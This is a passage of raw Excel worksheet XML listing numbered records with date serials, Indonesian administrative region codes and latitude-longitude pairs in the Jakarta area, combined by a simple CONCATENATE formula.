      <c r="S880" t="s">
        <v>49</v>
      </c>
      <c r="T880" t="s">
        <v>33</v>
      </c>
      <c r="U880" s="5">
        <v>10690207</v>
      </c>
      <c r="V880" s="5" t="s">
        <v>15270</v>
      </c>
      <c r="W880" s="5">
        <v>-618243</v>
      </c>
      <c r="X880" t="s">
        <v>19066</v>
      </c>
      <c r="Y880" t="str">
        <f t="shared" si="13"/>
        <v>-6.18243,106.90207</v>
      </c>
    </row>
    <row r="881" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A881">
        <v>108451</v>
      </c>
      <c r="B881" s="1">
        <v>43883</v>
      </c>
      <c r="C881">
        <v>1</v>
      </c>
      <c r="D881" t="s">
        <v>22</v>
      </c>
      <c r="E881" t="s">
        <v>23</v>
      </c>
      <c r="F881" t="s">
        <v>3443</v>
      </c>
      <c r="G881" t="s">
        <v>3444</v>
      </c>
      <c r="H881" t="s">
        <v>26</v>
      </c>
      <c r="I881" t="s">
        <v>271</v>
      </c>
      <c r="J881" t="s">
        <v>1788</v>
      </c>
      <c r="L881" t="s">
        <v>3445</v>
      </c>
      <c r="M881">
        <v>3175050003</v>
      </c>
      <c r="N881">
        <v>3175050</v>
      </c>
      <c r="O881">
        <v>3175</v>
      </c>
      <c r="P881">
        <v>31</v>
      </c>
      <c r="Q881" t="s">
        <v>1740</v>
      </c>
      <c r="R881" t="s">
        <v>1013</v>
      </c>
      <c r="S881" t="s">
        <v>547</v>
      </c>
      <c r="T881" t="s">
        <v>33</v>
      </c>
      <c r="U881" s="5">
        <v>10690989</v>
      </c>
      <c r="V881" s="5" t="s">
        <v>15271</v>
      </c>
      <c r="W881" s="5">
        <v>-615139</v>
      </c>
      <c r="X881" t="s">
        <v>19067</v>
      </c>
      <c r="Y881" t="str">
        <f t="shared" si="13"/>
        <v>-6.15139,106.90989</v>
      </c>
    </row>
    <row r="882" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A882">
        <v>108452</v>
      </c>
      <c r="B882" s="1">
        <v>43883</v>
      </c>
      <c r="C882">
        <v>1</v>
      </c>
      <c r="D882" t="s">
        <v>22</v>
      </c>
      <c r="E882" t="s">
        <v>23</v>
      </c>
      <c r="F882" t="s">
        <v>3446</v>
      </c>
      <c r="G882" t="s">
        <v>3447</v>
      </c>
      <c r="H882" t="s">
        <v>26</v>
      </c>
      <c r="I882" t="s">
        <v>383</v>
      </c>
      <c r="J882" t="s">
        <v>2627</v>
      </c>
      <c r="L882" t="s">
        <v>3448</v>
      </c>
      <c r="M882">
        <v>3216090003</v>
      </c>
      <c r="N882">
        <v>3216090</v>
      </c>
      <c r="O882">
        <v>3216</v>
      </c>
      <c r="P882">
        <v>32</v>
      </c>
      <c r="Q882" t="s">
        <v>3449</v>
      </c>
      <c r="R882" t="s">
        <v>335</v>
      </c>
      <c r="S882" t="s">
        <v>41</v>
      </c>
      <c r="T882" t="s">
        <v>42</v>
      </c>
      <c r="U882" s="5">
        <v>10702928</v>
      </c>
      <c r="V882" s="5" t="s">
        <v>15272</v>
      </c>
      <c r="W882" s="5">
        <v>-616222</v>
      </c>
      <c r="X882" t="s">
        <v>19068</v>
      </c>
      <c r="Y882" t="str">
        <f t="shared" si="13"/>
        <v>-6.16222,107.02928</v>
      </c>
    </row>
    <row r="883" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A883">
        <v>108453</v>
      </c>
      <c r="B883" s="1">
        <v>43883</v>
      </c>
      <c r="C883">
        <v>1</v>
      </c>
      <c r="D883" t="s">
        <v>22</v>
      </c>
      <c r="E883" t="s">
        <v>23</v>
      </c>
      <c r="F883" t="s">
        <v>3450</v>
      </c>
      <c r="H883" t="s">
        <v>26</v>
      </c>
      <c r="I883" t="s">
        <v>1201</v>
      </c>
      <c r="J883" t="s">
        <v>2871</v>
      </c>
      <c r="L883" t="s">
        <v>3451</v>
      </c>
      <c r="M883">
        <v>3172080003</v>
      </c>
      <c r="N883">
        <v>3172080</v>
      </c>
      <c r="O883">
        <v>3172</v>
      </c>
      <c r="P883">
        <v>31</v>
      </c>
      <c r="Q883" t="s">
        <v>2250</v>
      </c>
      <c r="R883" t="s">
        <v>141</v>
      </c>
      <c r="S883" t="s">
        <v>49</v>
      </c>
      <c r="T883" t="s">
        <v>33</v>
      </c>
      <c r="U883" s="5">
        <v>10695085</v>
      </c>
      <c r="V883" s="5" t="s">
        <v>15273</v>
      </c>
      <c r="W883" s="5">
        <v>-619956</v>
      </c>
      <c r="X883" t="s">
        <v>19069</v>
      </c>
      <c r="Y883" t="str">
        <f t="shared" si="13"/>
        <v>-6.19956,106.95085</v>
      </c>
    </row>
    <row r="884" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A884">
        <v>108454</v>
      </c>
      <c r="B884" s="1">
        <v>43883</v>
      </c>
      <c r="C884">
        <v>1</v>
      </c>
      <c r="D884" t="s">
        <v>22</v>
      </c>
      <c r="E884" t="s">
        <v>23</v>
      </c>
      <c r="F884" t="s">
        <v>3452</v>
      </c>
      <c r="G884" t="s">
        <v>3453</v>
      </c>
      <c r="H884" t="s">
        <v>26</v>
      </c>
      <c r="I884" t="s">
        <v>65</v>
      </c>
      <c r="J884" t="s">
        <v>3454</v>
      </c>
      <c r="L884" t="s">
        <v>3455</v>
      </c>
      <c r="M884">
        <v>3171090003</v>
      </c>
      <c r="N884">
        <v>3171090</v>
      </c>
      <c r="O884">
        <v>3171</v>
      </c>
      <c r="P884">
        <v>31</v>
      </c>
      <c r="Q884" t="s">
        <v>3154</v>
      </c>
      <c r="R884" t="s">
        <v>347</v>
      </c>
      <c r="S884" t="s">
        <v>108</v>
      </c>
      <c r="T884" t="s">
        <v>33</v>
      </c>
      <c r="U884" s="5">
        <v>10685214</v>
      </c>
      <c r="V884" s="5" t="s">
        <v>15274</v>
      </c>
      <c r="W884" s="5">
        <v>-622647</v>
      </c>
      <c r="X884" t="s">
        <v>19070</v>
      </c>
      <c r="Y884" t="str">
        <f t="shared" si="13"/>
        <v>-6.22647,106.85214</v>
      </c>
    </row>
    <row r="885" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A885">
        <v>108455</v>
      </c>
      <c r="B885" s="1">
        <v>43883</v>
      </c>
      <c r="C885">
        <v>1</v>
      </c>
      <c r="D885" t="s">
        <v>22</v>
      </c>
      <c r="E885" t="s">
        <v>23</v>
      </c>
      <c r="F885" t="s">
        <v>3456</v>
      </c>
      <c r="G885" t="s">
        <v>3457</v>
      </c>
      <c r="H885" t="s">
        <v>26</v>
      </c>
      <c r="I885" t="s">
        <v>886</v>
      </c>
      <c r="J885" t="s">
        <v>2722</v>
      </c>
      <c r="L885" t="s">
        <v>3458</v>
      </c>
      <c r="M885">
        <v>3173010003</v>
      </c>
      <c r="N885">
        <v>3173010</v>
      </c>
      <c r="O885">
        <v>3173</v>
      </c>
      <c r="P885">
        <v>31</v>
      </c>
      <c r="Q885" t="s">
        <v>2338</v>
      </c>
      <c r="R885" t="s">
        <v>1481</v>
      </c>
      <c r="S885" t="s">
        <v>62</v>
      </c>
      <c r="T885" t="s">
        <v>33</v>
      </c>
      <c r="U885" s="5">
        <v>10681107</v>
      </c>
      <c r="V885" s="5" t="s">
        <v>15275</v>
      </c>
      <c r="W885" s="5">
        <v>-620644</v>
      </c>
      <c r="X885" t="s">
        <v>18797</v>
      </c>
      <c r="Y885" t="str">
        <f t="shared" si="13"/>
        <v>-6.20644,106.81107</v>
      </c>
    </row>
    <row r="886" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A886">
        <v>108456</v>
      </c>
      <c r="B886" s="1">
        <v>43883</v>
      </c>
      <c r="C886">
        <v>1</v>
      </c>
      <c r="D886" t="s">
        <v>22</v>
      </c>
      <c r="E886" t="s">
        <v>23</v>
      </c>
      <c r="F886" t="s">
        <v>3459</v>
      </c>
      <c r="G886" t="s">
        <v>3460</v>
      </c>
      <c r="H886" t="s">
        <v>26</v>
      </c>
      <c r="I886" t="s">
        <v>1009</v>
      </c>
      <c r="J886" t="s">
        <v>2194</v>
      </c>
      <c r="L886" t="s">
        <v>3461</v>
      </c>
      <c r="M886">
        <v>3175050002</v>
      </c>
      <c r="N886">
        <v>3175050</v>
      </c>
      <c r="O886">
        <v>3175</v>
      </c>
      <c r="P886">
        <v>31</v>
      </c>
      <c r="Q886" t="s">
        <v>1012</v>
      </c>
      <c r="R886" t="s">
        <v>1013</v>
      </c>
      <c r="S886" t="s">
        <v>547</v>
      </c>
      <c r="T886" t="s">
        <v>33</v>
      </c>
      <c r="U886" s="5">
        <v>10690240</v>
      </c>
      <c r="V886" s="5" t="s">
        <v>15276</v>
      </c>
      <c r="W886" s="5">
        <v>-617341</v>
      </c>
      <c r="X886" t="s">
        <v>19071</v>
      </c>
      <c r="Y886" t="str">
        <f t="shared" si="13"/>
        <v>-6.17341,106.90240</v>
      </c>
    </row>
    <row r="887" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A887">
        <v>108457</v>
      </c>
      <c r="B887" s="1">
        <v>43883</v>
      </c>
      <c r="C887">
        <v>1</v>
      </c>
      <c r="D887" t="s">
        <v>22</v>
      </c>
      <c r="E887" t="s">
        <v>23</v>
      </c>
      <c r="F887" t="s">
        <v>3462</v>
      </c>
      <c r="H887" t="s">
        <v>26</v>
      </c>
      <c r="I887" t="s">
        <v>1359</v>
      </c>
      <c r="J887" t="s">
        <v>2268</v>
      </c>
      <c r="L887" t="s">
        <v>3463</v>
      </c>
      <c r="M887">
        <v>3175030002</v>
      </c>
      <c r="N887">
        <v>3175030</v>
      </c>
      <c r="O887">
        <v>3175</v>
      </c>
      <c r="P887">
        <v>31</v>
      </c>
      <c r="Q887" t="s">
        <v>1592</v>
      </c>
      <c r="R887" t="s">
        <v>1563</v>
      </c>
      <c r="S887" t="s">
        <v>547</v>
      </c>
      <c r="T887" t="s">
        <v>33</v>
      </c>
      <c r="U887" s="5">
        <v>10686202</v>
      </c>
      <c r="V887" s="5" t="s">
        <v>15277</v>
      </c>
      <c r="W887" s="5">
        <v>-615342</v>
      </c>
      <c r="X887" t="s">
        <v>19072</v>
      </c>
      <c r="Y887" t="str">
        <f t="shared" si="13"/>
        <v>-6.15342,106.86202</v>
      </c>
    </row>
    <row r="888" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A888">
        <v>108458</v>
      </c>
      <c r="B888" s="1">
        <v>43883</v>
      </c>
      <c r="C888">
        <v>1</v>
      </c>
      <c r="D888" t="s">
        <v>22</v>
      </c>
      <c r="E888" t="s">
        <v>23</v>
      </c>
      <c r="F888" t="s">
        <v>3464</v>
      </c>
      <c r="H888" t="s">
        <v>26</v>
      </c>
      <c r="I888" t="s">
        <v>1359</v>
      </c>
      <c r="J888" t="s">
        <v>3465</v>
      </c>
      <c r="L888" t="s">
        <v>3466</v>
      </c>
      <c r="M888">
        <v>3173060006</v>
      </c>
      <c r="N888">
        <v>3173060</v>
      </c>
      <c r="O888">
        <v>3173</v>
      </c>
      <c r="P888">
        <v>31</v>
      </c>
      <c r="Q888" t="s">
        <v>1587</v>
      </c>
      <c r="R888" t="s">
        <v>61</v>
      </c>
      <c r="S888" t="s">
        <v>62</v>
      </c>
      <c r="T888" t="s">
        <v>33</v>
      </c>
      <c r="U888" s="5">
        <v>10684974</v>
      </c>
      <c r="V888" s="5" t="s">
        <v>15278</v>
      </c>
      <c r="W888" s="5">
        <v>-616332</v>
      </c>
      <c r="X888" t="s">
        <v>19073</v>
      </c>
      <c r="Y888" t="str">
        <f t="shared" si="13"/>
        <v>-6.16332,106.84974</v>
      </c>
    </row>
    <row r="889" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A889">
        <v>108459</v>
      </c>
      <c r="B889" s="1">
        <v>43883</v>
      </c>
      <c r="C889">
        <v>1</v>
      </c>
      <c r="D889" t="s">
        <v>22</v>
      </c>
      <c r="E889" t="s">
        <v>23</v>
      </c>
      <c r="F889" t="s">
        <v>3467</v>
      </c>
      <c r="G889" t="s">
        <v>3468</v>
      </c>
      <c r="H889" t="s">
        <v>26</v>
      </c>
      <c r="I889" t="s">
        <v>1359</v>
      </c>
      <c r="J889" t="s">
        <v>3469</v>
      </c>
      <c r="L889" t="s">
        <v>3470</v>
      </c>
      <c r="M889">
        <v>3173020005</v>
      </c>
      <c r="N889">
        <v>3173020</v>
      </c>
      <c r="O889">
        <v>3173</v>
      </c>
      <c r="P889">
        <v>31</v>
      </c>
      <c r="Q889" t="s">
        <v>2041</v>
      </c>
      <c r="R889" t="s">
        <v>179</v>
      </c>
      <c r="S889" t="s">
        <v>62</v>
      </c>
      <c r="T889" t="s">
        <v>33</v>
      </c>
      <c r="U889" s="5">
        <v>10682839</v>
      </c>
      <c r="V889" s="5" t="s">
        <v>15279</v>
      </c>
      <c r="W889" s="5">
        <v>-618555</v>
      </c>
      <c r="X889" t="s">
        <v>19018</v>
      </c>
      <c r="Y889" t="str">
        <f t="shared" si="13"/>
        <v>-6.18555,106.82839</v>
      </c>
    </row>
    <row r="890" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A890">
        <v>108460</v>
      </c>
      <c r="B890" s="1">
        <v>43883</v>
      </c>
      <c r="C890">
        <v>1</v>
      </c>
      <c r="D890" t="s">
        <v>22</v>
      </c>
      <c r="E890" t="s">
        <v>23</v>
      </c>
      <c r="F890" t="s">
        <v>3471</v>
      </c>
      <c r="H890" t="s">
        <v>26</v>
      </c>
      <c r="I890" t="s">
        <v>27</v>
      </c>
      <c r="J890" t="s">
        <v>45</v>
      </c>
      <c r="L890" t="s">
        <v>3472</v>
      </c>
      <c r="M890">
        <v>3172060004</v>
      </c>
      <c r="N890">
        <v>3172060</v>
      </c>
      <c r="O890">
        <v>3172</v>
      </c>
      <c r="P890">
        <v>31</v>
      </c>
      <c r="Q890" t="s">
        <v>47</v>
      </c>
      <c r="R890" t="s">
        <v>48</v>
      </c>
      <c r="S890" t="s">
        <v>49</v>
      </c>
      <c r="T890" t="s">
        <v>33</v>
      </c>
      <c r="U890" s="5">
        <v>10688993</v>
      </c>
      <c r="V890" s="5" t="s">
        <v>15280</v>
      </c>
      <c r="W890" s="5">
        <v>-623363</v>
      </c>
      <c r="X890" t="s">
        <v>19074</v>
      </c>
      <c r="Y890" t="str">
        <f t="shared" si="13"/>
        <v>-6.23363,106.88993</v>
      </c>
    </row>
    <row r="891" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A891">
        <v>108461</v>
      </c>
      <c r="B891" s="1">
        <v>43883</v>
      </c>
      <c r="C891">
        <v>1</v>
      </c>
      <c r="D891" t="s">
        <v>22</v>
      </c>
      <c r="E891" t="s">
        <v>23</v>
      </c>
      <c r="F891" t="s">
        <v>3473</v>
      </c>
      <c r="G891" t="s">
        <v>3474</v>
      </c>
      <c r="H891" t="s">
        <v>26</v>
      </c>
      <c r="I891" t="s">
        <v>27</v>
      </c>
      <c r="J891" t="s">
        <v>3475</v>
      </c>
      <c r="L891" t="s">
        <v>3476</v>
      </c>
      <c r="M891">
        <v>3172080004</v>
      </c>
      <c r="N891">
        <v>3172080</v>
      </c>
      <c r="O891">
        <v>3172</v>
      </c>
      <c r="P891">
        <v>31</v>
      </c>
      <c r="Q891" t="s">
        <v>3084</v>
      </c>
      <c r="R891" t="s">
        <v>141</v>
      </c>
      <c r="S891" t="s">
        <v>49</v>
      </c>
      <c r="T891" t="s">
        <v>33</v>
      </c>
      <c r="U891" s="5">
        <v>10696887</v>
      </c>
      <c r="V891" s="5" t="s">
        <v>15281</v>
      </c>
      <c r="W891" s="5">
        <v>-617900</v>
      </c>
      <c r="X891" t="s">
        <v>19075</v>
      </c>
      <c r="Y891" t="str">
        <f t="shared" si="13"/>
        <v>-6.17900,106.96887</v>
      </c>
    </row>
    <row r="892" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A892">
        <v>108462</v>
      </c>
      <c r="B892" s="1">
        <v>43883</v>
      </c>
      <c r="C892">
        <v>1</v>
      </c>
      <c r="D892" t="s">
        <v>22</v>
      </c>
      <c r="E892" t="s">
        <v>23</v>
      </c>
      <c r="F892" t="s">
        <v>3477</v>
      </c>
      <c r="G892" t="s">
        <v>3478</v>
      </c>
      <c r="H892" t="s">
        <v>26</v>
      </c>
      <c r="I892" t="s">
        <v>3029</v>
      </c>
      <c r="J892" t="s">
        <v>1016</v>
      </c>
      <c r="L892" t="s">
        <v>3479</v>
      </c>
      <c r="M892">
        <v>3172060005</v>
      </c>
      <c r="N892">
        <v>3172060</v>
      </c>
      <c r="O892">
        <v>3172</v>
      </c>
      <c r="P892">
        <v>31</v>
      </c>
      <c r="Q892" t="s">
        <v>1019</v>
      </c>
      <c r="R892" t="s">
        <v>48</v>
      </c>
      <c r="S892" t="s">
        <v>49</v>
      </c>
      <c r="T892" t="s">
        <v>33</v>
      </c>
      <c r="U892" s="5">
        <v>10688050</v>
      </c>
      <c r="V892" s="5" t="s">
        <v>15282</v>
      </c>
      <c r="W892" s="5">
        <v>-621666</v>
      </c>
      <c r="X892" t="s">
        <v>19076</v>
      </c>
      <c r="Y892" t="str">
        <f t="shared" si="13"/>
        <v>-6.21666,106.88050</v>
      </c>
    </row>
    <row r="893" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A893">
        <v>108463</v>
      </c>
      <c r="B893" s="1">
        <v>43883</v>
      </c>
      <c r="C893">
        <v>1</v>
      </c>
      <c r="D893" t="s">
        <v>22</v>
      </c>
      <c r="E893" t="s">
        <v>23</v>
      </c>
      <c r="F893" t="s">
        <v>3480</v>
      </c>
      <c r="H893" t="s">
        <v>26</v>
      </c>
      <c r="I893" t="s">
        <v>3481</v>
      </c>
      <c r="J893" t="s">
        <v>2627</v>
      </c>
      <c r="L893" t="s">
        <v>3482</v>
      </c>
      <c r="M893">
        <v>3275061004</v>
      </c>
      <c r="N893">
        <v>3275061</v>
      </c>
      <c r="O893">
        <v>3275</v>
      </c>
      <c r="P893">
        <v>32</v>
      </c>
      <c r="Q893" t="s">
        <v>39</v>
      </c>
      <c r="R893" t="s">
        <v>40</v>
      </c>
      <c r="S893" t="s">
        <v>41</v>
      </c>
      <c r="T893" t="s">
        <v>42</v>
      </c>
      <c r="U893" s="5">
        <v>10699534</v>
      </c>
      <c r="V893" s="5" t="s">
        <v>15283</v>
      </c>
      <c r="W893" s="5">
        <v>-617798</v>
      </c>
      <c r="X893" t="s">
        <v>18572</v>
      </c>
      <c r="Y893" t="str">
        <f t="shared" si="13"/>
        <v>-6.17798,106.99534</v>
      </c>
    </row>
    <row r="894" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A894">
        <v>108464</v>
      </c>
      <c r="B894" s="1">
        <v>43883</v>
      </c>
      <c r="C894">
        <v>1</v>
      </c>
      <c r="D894" t="s">
        <v>22</v>
      </c>
      <c r="E894" t="s">
        <v>23</v>
      </c>
      <c r="F894" t="s">
        <v>3483</v>
      </c>
      <c r="H894" t="s">
        <v>26</v>
      </c>
      <c r="I894" t="s">
        <v>753</v>
      </c>
      <c r="J894" t="s">
        <v>2627</v>
      </c>
      <c r="L894" t="s">
        <v>3484</v>
      </c>
      <c r="M894">
        <v>3275061004</v>
      </c>
      <c r="N894">
        <v>3275061</v>
      </c>
      <c r="O894">
        <v>3275</v>
      </c>
      <c r="P894">
        <v>32</v>
      </c>
      <c r="Q894" t="s">
        <v>39</v>
      </c>
      <c r="R894" t="s">
        <v>40</v>
      </c>
      <c r="S894" t="s">
        <v>41</v>
      </c>
      <c r="T894" t="s">
        <v>42</v>
      </c>
      <c r="U894" s="5">
        <v>10698529</v>
      </c>
      <c r="V894" s="5" t="s">
        <v>15284</v>
      </c>
      <c r="W894" s="5">
        <v>-619146</v>
      </c>
      <c r="X894" t="s">
        <v>19077</v>
      </c>
      <c r="Y894" t="str">
        <f t="shared" si="13"/>
        <v>-6.19146,106.98529</v>
      </c>
    </row>
    <row r="895" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A895">
        <v>108465</v>
      </c>
      <c r="B895" s="1">
        <v>43883</v>
      </c>
      <c r="C895">
        <v>1</v>
      </c>
      <c r="D895" t="s">
        <v>22</v>
      </c>
      <c r="E895" t="s">
        <v>23</v>
      </c>
      <c r="F895" t="s">
        <v>3485</v>
      </c>
      <c r="G895" t="s">
        <v>3486</v>
      </c>
      <c r="H895" t="s">
        <v>26</v>
      </c>
      <c r="I895" t="s">
        <v>1758</v>
      </c>
      <c r="J895" t="s">
        <v>2627</v>
      </c>
      <c r="L895" t="s">
        <v>3487</v>
      </c>
      <c r="M895">
        <v>3275061004</v>
      </c>
      <c r="N895">
        <v>3275061</v>
      </c>
      <c r="O895">
        <v>3275</v>
      </c>
      <c r="P895">
        <v>32</v>
      </c>
      <c r="Q895" t="s">
        <v>39</v>
      </c>
      <c r="R895" t="s">
        <v>40</v>
      </c>
      <c r="S895" t="s">
        <v>41</v>
      </c>
      <c r="T895" t="s">
        <v>42</v>
      </c>
      <c r="U895" s="5">
        <v>10697943</v>
      </c>
      <c r="V895" s="5" t="s">
        <v>15285</v>
      </c>
      <c r="W895" s="5">
        <v>-617324</v>
      </c>
      <c r="X895" t="s">
        <v>19078</v>
      </c>
      <c r="Y895" t="str">
        <f t="shared" si="13"/>
        <v>-6.17324,106.97943</v>
      </c>
    </row>
    <row r="896" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A896">
        <v>108466</v>
      </c>
      <c r="B896" s="1">
        <v>43883</v>
      </c>
      <c r="C896">
        <v>1</v>
      </c>
      <c r="D896" t="s">
        <v>22</v>
      </c>
      <c r="E896" t="s">
        <v>23</v>
      </c>
      <c r="F896" s="3" t="s">
        <v>3488</v>
      </c>
      <c r="G896" t="s">
        <v>3489</v>
      </c>
      <c r="H896" t="s">
        <v>26</v>
      </c>
      <c r="I896" t="s">
        <v>3275</v>
      </c>
      <c r="J896" t="s">
        <v>3490</v>
      </c>
      <c r="L896" t="s">
        <v>3491</v>
      </c>
      <c r="M896">
        <v>3171090005</v>
      </c>
      <c r="N896">
        <v>3171090</v>
      </c>
      <c r="O896">
        <v>3171</v>
      </c>
      <c r="P896">
        <v>31</v>
      </c>
      <c r="Q896" t="s">
        <v>1300</v>
      </c>
      <c r="R896" t="s">
        <v>347</v>
      </c>
      <c r="S896" t="s">
        <v>108</v>
      </c>
      <c r="T896" t="s">
        <v>33</v>
      </c>
      <c r="U896" s="5">
        <v>10685459</v>
      </c>
      <c r="V896" s="5" t="s">
        <v>15286</v>
      </c>
      <c r="W896" s="5">
        <v>-622157</v>
      </c>
      <c r="X896" t="s">
        <v>19079</v>
      </c>
      <c r="Y896" t="str">
        <f t="shared" si="13"/>
        <v>-6.22157,106.85459</v>
      </c>
    </row>
    <row r="897" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A897">
        <v>108467</v>
      </c>
      <c r="B897" s="1">
        <v>43883</v>
      </c>
      <c r="C897">
        <v>1</v>
      </c>
      <c r="D897" t="s">
        <v>22</v>
      </c>
      <c r="E897" t="s">
        <v>23</v>
      </c>
      <c r="F897" t="s">
        <v>3492</v>
      </c>
      <c r="G897" t="s">
        <v>3493</v>
      </c>
      <c r="H897" t="s">
        <v>26</v>
      </c>
      <c r="I897" t="s">
        <v>3494</v>
      </c>
      <c r="J897" t="s">
        <v>3475</v>
      </c>
      <c r="L897" t="s">
        <v>3495</v>
      </c>
      <c r="M897">
        <v>3172080004</v>
      </c>
      <c r="N897">
        <v>3172080</v>
      </c>
      <c r="O897">
        <v>3172</v>
      </c>
      <c r="P897">
        <v>31</v>
      </c>
      <c r="Q897" t="s">
        <v>3084</v>
      </c>
      <c r="R897" t="s">
        <v>141</v>
      </c>
      <c r="S897" t="s">
        <v>49</v>
      </c>
      <c r="T897" t="s">
        <v>33</v>
      </c>
      <c r="U897" s="5">
        <v>10696903</v>
      </c>
      <c r="V897" s="5" t="s">
        <v>15287</v>
      </c>
      <c r="W897" s="5">
        <v>-618119</v>
      </c>
      <c r="X897" t="s">
        <v>19080</v>
      </c>
      <c r="Y897" t="str">
        <f t="shared" si="13"/>
        <v>-6.18119,106.96903</v>
      </c>
    </row>
    <row r="898" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A898">
        <v>108468</v>
      </c>
      <c r="B898" s="1">
        <v>43883</v>
      </c>
      <c r="C898">
        <v>1</v>
      </c>
      <c r="D898" t="s">
        <v>22</v>
      </c>
      <c r="E898" t="s">
        <v>23</v>
      </c>
      <c r="F898" t="s">
        <v>3496</v>
      </c>
      <c r="G898" t="s">
        <v>3497</v>
      </c>
      <c r="H898" t="s">
        <v>26</v>
      </c>
      <c r="I898" t="s">
        <v>1080</v>
      </c>
      <c r="J898" t="s">
        <v>3498</v>
      </c>
      <c r="L898" t="s">
        <v>3499</v>
      </c>
      <c r="M898">
        <v>3175060006</v>
      </c>
      <c r="N898">
        <v>3175060</v>
      </c>
      <c r="O898">
        <v>3175</v>
      </c>
      <c r="P898">
        <v>31</v>
      </c>
      <c r="Q898" t="s">
        <v>2409</v>
      </c>
      <c r="R898" t="s">
        <v>2279</v>
      </c>
      <c r="S898" t="s">
        <v>547</v>
      </c>
      <c r="T898" t="s">
        <v>33</v>
      </c>
      <c r="U898" s="5">
        <v>10692594</v>
      </c>
      <c r="V898" s="5" t="s">
        <v>15288</v>
      </c>
      <c r="W898" s="5">
        <v>-613658</v>
      </c>
      <c r="X898" t="s">
        <v>19081</v>
      </c>
      <c r="Y898" t="str">
        <f t="shared" si="13"/>
        <v>-6.13658,106.92594</v>
      </c>
    </row>
    <row r="899" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A899">
        <v>108469</v>
      </c>
      <c r="B899" s="1">
        <v>43883</v>
      </c>
      <c r="C899">
        <v>1</v>
      </c>
      <c r="D899" t="s">
        <v>22</v>
      </c>
      <c r="E899" t="s">
        <v>23</v>
      </c>
      <c r="F899" t="s">
        <v>3500</v>
      </c>
      <c r="H899" t="s">
        <v>26</v>
      </c>
      <c r="I899" t="s">
        <v>882</v>
      </c>
      <c r="J899" t="s">
        <v>3501</v>
      </c>
      <c r="L899" t="s">
        <v>3502</v>
      </c>
      <c r="M899">
        <v>3175060001</v>
      </c>
      <c r="N899">
        <v>3175060</v>
      </c>
      <c r="O899">
        <v>3175</v>
      </c>
      <c r="P899">
        <v>31</v>
      </c>
      <c r="Q899" t="s">
        <v>2278</v>
      </c>
      <c r="R899" t="s">
        <v>2279</v>
      </c>
      <c r="S899" t="s">
        <v>547</v>
      </c>
      <c r="T899" t="s">
        <v>33</v>
      </c>
      <c r="U899" s="5">
        <v>10691905</v>
      </c>
      <c r="V899" s="5" t="s">
        <v>15289</v>
      </c>
      <c r="W899" s="5">
        <v>-614400</v>
      </c>
      <c r="X899" t="s">
        <v>19082</v>
      </c>
      <c r="Y899" t="str">
        <f t="shared" ref="Y899:Y962" si="14">CONCATENATE(X899,",",V899)</f>
        <v>-6.14400,106.91905</v>
      </c>
    </row>
    <row r="900" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A900">
        <v>108470</v>
      </c>
      <c r="B900" s="1">
        <v>43883</v>
      </c>
      <c r="C900">
        <v>1</v>
      </c>
      <c r="D900" t="s">
        <v>22</v>
      </c>
      <c r="E900" t="s">
        <v>23</v>
      </c>
      <c r="F900" t="s">
        <v>3503</v>
      </c>
      <c r="G900" t="s">
        <v>3504</v>
      </c>
      <c r="H900" t="s">
        <v>26</v>
      </c>
      <c r="I900" t="s">
        <v>974</v>
      </c>
      <c r="J900" t="s">
        <v>3475</v>
      </c>
      <c r="L900" t="s">
        <v>3505</v>
      </c>
      <c r="M900">
        <v>3172080004</v>
      </c>
      <c r="N900">
        <v>3172080</v>
      </c>
      <c r="O900">
        <v>3172</v>
      </c>
      <c r="P900">
        <v>31</v>
      </c>
      <c r="Q900" t="s">
        <v>3084</v>
      </c>
      <c r="R900" t="s">
        <v>141</v>
      </c>
      <c r="S900" t="s">
        <v>49</v>
      </c>
      <c r="T900" t="s">
        <v>33</v>
      </c>
      <c r="U900" s="5">
        <v>10696938</v>
      </c>
      <c r="V900" s="5" t="s">
        <v>14988</v>
      </c>
      <c r="W900" s="5">
        <v>-617836</v>
      </c>
      <c r="X900" t="s">
        <v>19083</v>
      </c>
      <c r="Y900" t="str">
        <f t="shared" si="14"/>
        <v>-6.17836,106.96938</v>
      </c>
    </row>
    <row r="901" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A901">
        <v>108471</v>
      </c>
      <c r="B901" s="1">
        <v>43883</v>
      </c>
      <c r="C901">
        <v>1</v>
      </c>
      <c r="D901" t="s">
        <v>22</v>
      </c>
      <c r="E901" t="s">
        <v>23</v>
      </c>
      <c r="F901" t="s">
        <v>3506</v>
      </c>
      <c r="G901" t="s">
        <v>3507</v>
      </c>
      <c r="H901" t="s">
        <v>26</v>
      </c>
      <c r="I901" t="s">
        <v>65</v>
      </c>
      <c r="J901" t="s">
        <v>1100</v>
      </c>
      <c r="L901" t="s">
        <v>3508</v>
      </c>
      <c r="M901">
        <v>3172090007</v>
      </c>
      <c r="N901">
        <v>3172090</v>
      </c>
      <c r="O901">
        <v>3172</v>
      </c>
      <c r="P901">
        <v>31</v>
      </c>
      <c r="Q901" t="s">
        <v>890</v>
      </c>
      <c r="R901" t="s">
        <v>890</v>
      </c>
      <c r="S901" t="s">
        <v>49</v>
      </c>
      <c r="T901" t="s">
        <v>33</v>
      </c>
      <c r="U901" s="5">
        <v>10689872</v>
      </c>
      <c r="V901" s="5" t="s">
        <v>15290</v>
      </c>
      <c r="W901" s="5">
        <v>-618077</v>
      </c>
      <c r="X901" t="s">
        <v>19084</v>
      </c>
      <c r="Y901" t="str">
        <f t="shared" si="14"/>
        <v>-6.18077,106.89872</v>
      </c>
    </row>
    <row r="902" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A902">
        <v>108472</v>
      </c>
